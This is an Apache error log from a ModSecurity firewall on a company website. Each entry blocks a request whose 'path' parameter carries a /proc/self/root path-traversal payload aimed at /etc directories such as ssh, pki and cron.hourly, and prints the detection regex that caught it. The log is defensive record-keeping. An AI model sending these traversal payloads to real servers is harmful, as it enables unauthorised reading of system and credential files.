[Mon Mar 16 14:15:42.848922 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.243.203:49116] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6vrABkC4fWIHEf8H3EAAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:15:44.183794 2026] [:error] [pid 21806:tid 140411557287680] [client 74.7.243.203:49126] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6wNSswJuvopo3lOhnZgAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:15:45.573149 2026] [:error] [pid 14895:tid 140411741927168] [client 74.7.243.203:49142] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6wVajLEzk2WiQ-10afwAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:15:46.407671 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.241.46:60440] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6wtSswJuvopo3lOhnaAAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:15:47.705440 2026] [:error] [pid 15568:tid 140411725141760] [client 74.7.241.46:60454] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6w6QpVkWug9HeOt89mAAAA0I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:15:51.822868 2026] [:error] [pid 21806:tid 140411674785536] [client 74.7.243.203:49152] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6x9SswJuvopo3lOhnbQAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:15:53.263949 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.243.203:44192] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6ydSswJuvopo3lOhncQAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:15:54.586073 2026] [:error] [pid 21806:tid 140411548894976] [client 74.7.243.203:44202] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6ytSswJuvopo3lOhncgAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:15:55.912091 2026] [:error] [pid 11972:tid 140411590858496] [client 74.7.243.203:44216] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6y5qj1wV0Si-Okef3DAAAABI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:15:57.249704 2026] [:error] [pid 10831:tid 140411624429312] [client 74.7.243.203:44220] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6zY6lpbStxTqkSkt0zwAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:15:57.911971 2026] [:error] [pid 15568:tid 140411599251200] [client 74.7.241.46:60944] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6zaQpVkWug9HeOt89qQAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:15:58.473065 2026] [:error] [pid 21533:tid 140411716749056] [client 74.7.243.203:44236] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6znjZBu2q05ozVU9hcgAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:15:59.177894 2026] [:error] [pid 11972:tid 140411699963648] [client 74.7.241.46:47880] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6z5qj1wV0Si-Okef3DQAAAAU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:15:59.792489 2026] [:error] [pid 11972:tid 140411674785536] [client 74.7.243.203:44246] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6z5qj1wV0Si-Okef3DgAAAAg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:16:01.122042 2026] [:error] [pid 21805:tid 140411548894976] [client 74.7.243.203:41018] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg60bABkC4fWIHEf8H3FAAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:16:02.587769 2026] [:error] [pid 15061:tid 140411557287680] [client 74.7.241.46:47892] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg60qTCbgAP5jq5TegzIAAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:16:03.622374 2026] [:error] [pid 10772:tid 140411632822016] [client 74.7.243.203:41026] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg60_9ocpUE4ed4uDz4TgAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:16:04.984164 2026] [:error] [pid 10831:tid 140411666392832] [client 74.7.243.203:41034] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg61I6lpbStxTqkSkt00AAAAkk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:16:06.385363 2026] [:error] [pid 10831:tid 140411548894976] [client 74.7.243.203:41046] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg61o6lpbStxTqkSkt00QAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:16:08.895224 2026] [:error] [pid 15568:tid 140411616036608] [client 74.7.241.46:47898] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg62KQpVkWug9HeOt89tgAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:16:09.880712 2026] [:error] [pid 14895:tid 140411708356352] [client 74.7.243.203:41054] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg62VajLEzk2WiQ-10ahAAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
